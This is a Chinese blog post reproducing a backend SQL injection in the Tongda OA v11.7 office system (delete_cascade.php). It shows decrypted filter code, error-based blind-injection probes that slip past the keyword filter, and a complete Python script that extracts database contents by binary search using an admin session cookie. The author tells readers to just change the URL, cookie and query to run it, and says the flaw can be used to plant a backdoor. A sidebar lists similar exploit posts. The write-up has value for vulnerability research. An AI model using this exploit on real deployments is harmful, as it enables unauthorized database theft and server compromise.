通达OA v11.7后台SQL注入

最新推荐文章于 2024-02-18 16:52:46 发布
最新推荐文章于 2024-02-18 16:52:46 发布
阅读量1.4k 收藏
点赞数 4
分类专栏: # 漏洞复现
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/118367966
版权

文章目录

漏洞描述

通达OA v11.7后台存在SQL注入,可通过此漏洞写入恶意后门文件攻击目标服务器。

漏洞影响

通达OA <= v11.7

漏洞分析

下载通达oa 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe

这里我觉得麻烦就用11.5分析了,大致都差不多的,最多多了几个过滤。

使用解密工具 SeayDzend(zend解密工具) 对通达OA的加密代码进行解密
在这里插入图片描述

漏洞位置:/general/hr/manage/query/delete_cascade.php
在这里插入图片描述如果$condition_cascade不为空就把里面的\'替换为',然后执行。

原因:V11.7版本中,注册变量时考虑了安全问题,将用户输入的字符用addslashes函数进行保护。

具体代码在inc/common.inc.php中,接收了我们的输入$_GET,然后将值$s_value进行了addslashes处理

在这里插入图片描述

addslashes()作用
在这里插入图片描述

我们再来看看是怎么执行SQL语句的,在delete_cascade.php中,使用的是exequery()函数。而inc/conn.php文件中是对SQL语句的各种处理函数。
在这里插入图片描述我们跟踪exequery()函数,可以在inc/conn.php中找到定义,可以发现这里又调用了db_query()函数。

在这里插入图片描述
我们继续跟踪db_query()函数,可以发现这里就是执行SQL语句的函数,但是执行之前使用sql_injection()函数进行了过滤。
在这里插入图片描述sql_injection()函数如下所示。

function sql_injection($db_string)
{
	$clean = "";
	$error = "";
	$old_pos = 0;
	$pos = -1;
	$db_string = str_replace("&#160;", " ", $db_string);

	while (true) {
		$pos = strpos($db_string, "'", $pos + 1);

		if ($pos === false) {
			break;
		}

		$clean .= substr($db_string, $old_pos, $pos - $old_pos);

		while (true) {
			$pos1 = strpos($db_string, "'", $pos + 1);
			$pos2 = strpos($db_string, "\\", $pos + 1);

			if ($pos1 === false) {
				break;
			}
			else {
				if (($pos2 == false) || ($pos1 < $pos2)) {
					$pos = $pos1;
					break;
				}
			}

			$pos = $pos2 + 1;
		}

		$clean .= "\$s\$";
		$old_pos = $pos + 1;
	}

	$clean .= substr($db_string, $old_pos);
	$clean = trim(strtolower(preg_replace(array("~\s+~s"), array(" "), $clean)));
	$fail = false;
	if ((strpos($clean, "union") !== false) && (preg_match("~(^|[^a-z])union($|[^[a-z])~s", $clean) != 0)) {
		$fail = true;
		$error = _("联合查询");
	}
	else {
		if ((2 < strpos($clean, "/*")) || (strpos($clean, "--") !== false) || (strpos($clean, "#") !== false)) {
			$fail = true;
			$error = _("注释代码");
		}
		else {
			if ((strpos($clean, "sleep") !== false) && (preg_match("~(^|[^a-z])sleep($|[^[a-z])~s", $clean) != 0)) {
				$fail = true;
				$error = "sleep";
			}
			else {
				if ((strpos($clean, "benchmark") !== false) && (preg_match("~(^|[^a-z])benchmark($|[^[a-z])~s", $clean) != 0)) {
					$fail = true;
					$error = "benchmark";
				}
				else {
					if ((strpos($clean, "load_file") !== false) && (preg_match("~(^|[^a-z])load_file($|[^[a-z])~s", $clean) != 0)) {
						$fail = true;
						$error = _("Load文件");
					}
					else {
						if ((strpos($clean, "cast") !== false) && (preg_match("~(^|[^a-z])mid($|[^[a-z])~s", $clean) != 0)) {
							$fail = true;
							$error = "cast";
						}
						else {
							if ((strpos($clean, "ord") !== false) && (preg_match("~(^|[^a-z])ord($|[^[a-z])~s", $clean) != 0)) {
								$fail = true;
								$error = "ord";
							}
							else {
								if ((strpos($clean, "ascii") !== false) && (preg_match("~(^|[^a-z])ascii($|[^[a-z])~s", $clean) != 0)) {
									$fail = true;
									$error = "ascii";
								}
								else {
									if ((strpos($clean, "extractvalue") !== false) && (preg_match("~(^|[^a-z])extractvalue($|[^[a-z])~s", $clean) != 0)) {
										$fail = true;
										$error = "extractvalue";
									}
									else {
										if ((strpos($clean, "updatexml") !== false) && (preg_match("~(^|[^a-z])updatexml($|[^[a-z])~s", $clean) != 0)) {
											$fail = true;
											$error = "updatexml";
										}
										else {
											if ((strpos($clean, "into outfile") !== false) && (preg_match("~(^|[^a-z])into\s+outfile($|[^[a-z])~s", $clean) != 0)) {
												$fail = true;
												$error = _("生成文件");
											}
											else {
												if ((strpos($clean, "exp") !== false) && (preg_match("~(^|[^a-z])exp($|[^[a-z])~s", $clean) != 0)) {
													$fail = true;
													$error = _("exp");
												}
												else {
													if ((stripos($db_string, "update") !== false) && (stripos($db_string, "user") !== false) && (stripos($db_string, "set") !== false) && (stripos($db_string, "file_priv") !== false)) {
														$fail = true;
														$error = "set file_priv";
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}
		}
	}

	if ($fail) {
		echo _("不安全的SQL语句:") . $error . "<br />";
		echo td_htmlspecialchars($db_string);
		exit();
	}
	else {
		return $db_string;
	}
}

过滤了union /* sleep benchmark load_file cast ord ascii extractvaleue updatexml into outfile exp update user set file_priv set file_priv 这些字符,盲注的核心是:substrif等函数,均未被过滤,那么只要构造MySQL报错即可配合if函数进行盲注了。

这里可以使用if来进行报错注入,这里还知道了power(9999,99)也能报错,当字符相等时,不报错,错误时报错。

select if(1=1,1,power(9999,99))
select if(1=2,1,power(9999,99))

也可以用rlike报错注入

select 1 RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END))
select 1 RLIKE (SELECT (CASE WHEN (1=2) THEN 1 ELSE 0x28 END))

如下所示,1=1返回成功,1=2则报错,说明存在盲注
在这里插入图片描述
在这里插入图片描述
老规矩,直接用脚本来进行注入

import requests
import urllib
url = 'http://192.168.8.21:8080/general/hr/manage/query/delete_cascade.php'
cookies = "USER_NAME_COOKIE=admin; SID_1=742da844; SID_65=8232122; OA_USER_ID=admin; PHPSESSID=osa9rkacs839k0ki2s48i2d921"
sql = '(select database())'
flag = ''
for i in range(1, 50):
    high = 132
    low = 32
    mid = (high+low)//2
    while high > low:
        char = flag+chr(mid)
        headers = {
            "cookie": urllib.parse.unquote(cookies)
        }
        target = url + "?condition_cascade=select 3 RLIKE (SELECT (CASE WHEN (substr({0},{1},1)>={2}) THEN 1 ELSE " \
                       "0x28 END))".format(sql, i, hex(mid))
        s = requests.get(url=target, headers=headers)
        if '信息删除成功' in s.text:
            low = mid+1
        else:
            high = mid
        mid = (high+low)//2
        if mid == 33 or mid ==132:
            exit(0)
    flag += chr(mid-1)
    print("[+] "+flag)

修改一下脚本中的url、cookie、和要执行的SQL语句即可
在这里插入图片描述

天问_Herbert555
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
【漏洞复现】通达oa 前台sql注入
失心少年
11-19 381
它涵盖了企业日常办公所需的各项功能,包括人事管理、财务管理、采购管理、销售管理、库存管理、生产管理、办公自动化等。通达OA支持PC端和移动端使用,可以实现随时随地办公,提高工作效率和协作能力。同时,它还具备高度可定制性和扩展性,可以根据企业的实际需求进行定制开发,满足企业的个性化需求。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
红帆iOffice ioDesktopData.asmx接口存在SQL注入漏洞 附POC软件
最新发布
nnn2188185的博客
03-04 181
红帆iOffice ioDesktopData.asmx接口存在SQL注入漏洞 附POC软件
2022-10-10(通达OA SQL注入漏洞)
qq_45751902的博客
10-10 1909
经过测试发现过滤了单引号,对r字符进行转换成16进制,通过手工最终获得数据库用户名root。使用手工注入,经过测试发现过滤了单引号,对r字符进行转换成16进制(用户名是root)首先创建一个普通账户 lisi:lisi123456。中存在 一个$_GET[“id”];参数位置:SORT_ID,FILE_SORT。发现时间明显变长了,再此证明id没有被过滤。登录账号是admin,密码为空。利用条件:一枚普通账号登录权限。利用条件:11.5版本无需登录。
WEB安全基础 - - -SQL注入利用
weixin_67503304的博客
07-13 991
以web安全中的SQL语句为了,以sqli-labs的Less-1为例子,详细解释了SQL语句的利用。
通达OA SQL注入漏洞【CVE-2023-4165】
holyxp的博客
08-10 2501
通达OA系统,即Offic Anywhere,又称为网络智能办公系统,是通达科技公司针对各行业办公与管理开发的办公应用系统。通达OA系统采用领先的B/S架构,采用基于WEB网络的开发方式,能够使得企业及个人办公不再受地域限制,实现信息化、自动化、移动化高效便捷办公。漏洞1(CVE-2023-4165)文件,对参数 DELETE_STR 的操作会导致 sql 注入。
通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)
bluemoon_0的博客
02-15 689
通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)
通达 oa 2010 php 源代码 解密
11-03
通达OA2010版本,完整general目录下php文件无加密,示例: <?php /*********************/ /* */ /* Version : 5.1.0 */ /* Author : RM */ /* Comment : 071223 */ /* */ /*********************/ include_once( "inc/auth.php" ); if ( $LOGIN_THEME != "10" ) { $query = "SELECT * from INTERFACE"; $cursor = exequery( $connection, $query ); if ( $ROW = mysql_fetch_array( $cursor ) ) { $IE_TITLE = $ROW['IE_TITLE']; } echo "<html>\r\n<head>\r\n<title>"; echo $IE_TITLE; echo "</title>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\">\r\n[removed][removed]\r\n[removed]\r\nself.moveTo(0,0);\r\nself.resizeTo(screen.availWidth,screen.availHeight);\r\nself.focus();\r\n\r\nrelogin=0;\r\nfunction exit()\r\n{\r\n if(document.body.clientWidth-event.clientX<50||event.altKey||event.ctrlKey)\r\n {\r\n"; if ( $ISPIRIT == 1 ) { echo "return;"; } echo " var req = new_req();\r\n\treq.open(\"GET\", \"relogin.php\", true);\r\n\treq.send('');\r\n }\r\n}\r\n\r\n[removed]\r\n</head>\r\n"; include_once( "inc/antivirus.txt" ); echo "<frameset rows=\"50,*,20\" cols=\"*\" frameborder=\"no\" border=\"0\" framespacing=\"0\" id=\"frame1\" <frame name=\"banner\" id=\"banner\" scrolling=\"no\" noresize=\"noresize\" src=\"topbar.php\" frameborder=\"0\">\r\n <frameset rows=\"*\" cols=\"200,*\" frameborder=\"no\" border=\"0\" framespacing=\"0\" id=\"frame2\">\r\n <frame name=\"leftmenu\" id=\"leftmenu\" scrolling=\"no\" noresize=\"noresize\" src=\"ipanel\" frameborder=\"0\">\r\n <frame name=\"table_index\" id=\"table_index\" scrolling=\"no\" src=\"table.php\" frameborder=\"0\">\r\n </frameset>\r\n <frame name=\"status_bar\" id=\"status_bar\" scrolling=\"no\" noresize=\"noresize\" src=\"status_bar\" frameborder=\"0\">\r\n</frameset>\r\n</html>\r\n"; exit( ); } include_once( "inc/utility_all.php" ); include_once( "inc/td_core.php" ); include_once( "inc/chinese_date.php" ); include_once( "inc/sys_function_all.php" ); ob_end_clean( ); 本资源(仅供技术学习,版权归原公司所有)
【漏洞复现-通达OA通达OA share存在前台SQL注入漏洞
xiaokp7的博客
02-18 441
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。通达OA /share/handle.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。
通达oa php漏洞,通达OA前台任意用户登录漏洞
weixin_42407606的博客
03-10 2578
本文由东塔网络安全学院学员---张同学 投稿。1 漏洞描述通达OA是一套使用比较广泛的办公系统。该漏洞因为使用uid作为身份标识,攻击者通过构造恶意请求,可以直接绕过登录验证逻辑,伪装为系统管理员身份登录OA系统。通达OA官方于2020年4月17日发布安全更新。2 影响版本通达OA < 11.5.200417版本通达OA 2017版本3 漏洞原理本次复现为2017版本,则重点分析该版本,但原...
通达OA 11.5 SQL注入漏洞复现
zzf011900的博客
11-10 366
sqlmap 的payload:布尔盲注:link_type=false&slot={}&id=(SELECT (CASE WHEN (2489=2489) THEN 2 ELSE (SELECT 2530 UNION SELECT 6370) END))link_type=false&slot={}&id=2,用burp抓包。
通达OA 11.5 sql注入漏洞复现
weixin_46801402的博客
11-01 590
通达OA 11.5 sql注入漏洞复现
[0day]通达 OA v11.7 后台 SQL 注入到 RCE1
08-03
1. 测试环境 2. 代码审计发现注 3. 构造利链
通达OA v11.6 insert SQL注入漏洞.md
09-07
通达OA漏洞合集
通达OA sql注入漏洞.zip
08-24
已实现漏洞验证脚本
通达OA v11.5 swfupload_new.php SQL注入漏洞.md
09-07
通达OA漏洞合集
泛微OA8前台sql注入1
08-08
cmd=getSelectAllId&sql=***注入点 在getdata.jsp中,直接将request对象交给weaver.hrm.common.Ajax
注册框sql注入_通达OA多处SQL注入漏洞
weixin_39996234的博客
11-16 463
通达OA最近悄咪咪的更新了一次,以下所发漏洞在新版基本已经失效超全局变量覆盖导致SQL注入首先是全局初始化参数:if (0 < count($_GET)) { foreach ($_GET as $s_key => $s_value ) { if (!is_array($s_value)) { $_GET[$s_key] = adds...
Java_OAexp工具设计及实现-Thelostworld_OA
thelostworld
05-02 3215
本文约1700字,阅读约需6分钟。本文主要介绍基于JavaFX图形化界面开发的快速OA类利用工具。笔者收集和整理了目前工具OA类验证及其利用的方式和方法,整合成一个方便快捷图形化的快速利用工具。想要写这个工具的原因,主要是日常工作中,OA漏洞利用总是需要去找无数验证脚本,操作繁琐。为了方便日常渗透测试,简单快捷地进行OA利用渗透,方便团队提升效率,笔者撰写了这款工具。设计初期,笔者收集和查看了一些师傅所撰写的OA利用相关工具和文章,都是部分漏洞的利用和探测,比较单一。在这个情况下,笔者把现存披露的漏洞利用
通达OA 前台任意用户登录漏洞复现(更新手工获取cookie过程)
thelostworld
05-12 2685
新增内容1:范围今天不是炒冷饭:主要是昨天有个兄弟看了文章后问了一下怎么手动获取cookie,相互交流了一下,觉得还是有必要发一下,这个手工获取cookie的流程。一、漏洞描述通达OA是一套办公系统。通达OA官方于4月17日发布安全更新。经分析,在该次安全更新中修复了包括任意用户登录在内的高危漏洞。攻击者通过构造恶意请求,可以直接绕过登录验证逻辑,伪装为系统管理员身份登录OA系统。二、影响版本通达OA2017、V11.X<V11.5环境搭建:自行镜像环境搭建(后台回复“tongda”获取环境和POC)
致远oa怎样通过sql注入获得密码
07-27
致远OA是一个商业级的办公自动化系统,为了保障系统的安全性,开发者在设计时应该会尽可能地避免常见的安全漏洞,如SQL注入SQL注入是一种常见的Web安全漏洞,攻击者通过注入恶意的SQL代码,从而绕过应用程序的输入验证,获取或篡改数据库中的数据。然而,对于致远OA这样的商业级系统,一般来说,开发团队应该会采取一系列的措施来防止SQL注入。 以下是一些可能的措施: 1. 输入验证和过滤:致远OA应该对用户输入进行严格的验证和过滤,并防止任何潜在的恶意SQL代码通过。这可以通过使用Web应用程序防火墙(WAF)、编写安全的输入验证规则、限制特殊字符的输入等方式实现。 2. 参数化查询:致远OA应该使用参数化查询或预编译语句,而不是拼接用户输入来执行SQL查询。参数化查询可以有效防止SQL注入,因为参数化查询会将用户的输入作为参数传递给数据库,而不是直接将其拼接为SQL语句。 3. 存储过程和视图:致远OA可以使用存储过程或视图来处理数据库操作,从而减少执行动态SQL语句的机会,并提高安全性。 4. 安全漏洞扫描和修补:致远OA的开发团队应该进行定期的安全漏洞扫描,及时修补已经发现的漏洞,并持续跟踪和更新最新的安全补丁。 总之,致远OA作为一个商业级的办公自动化系统,应该采取多种安全措施来防止SQL注入和其他安全漏洞的影响。用户也应该及时更新系统和软件的最新版本,以提高系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值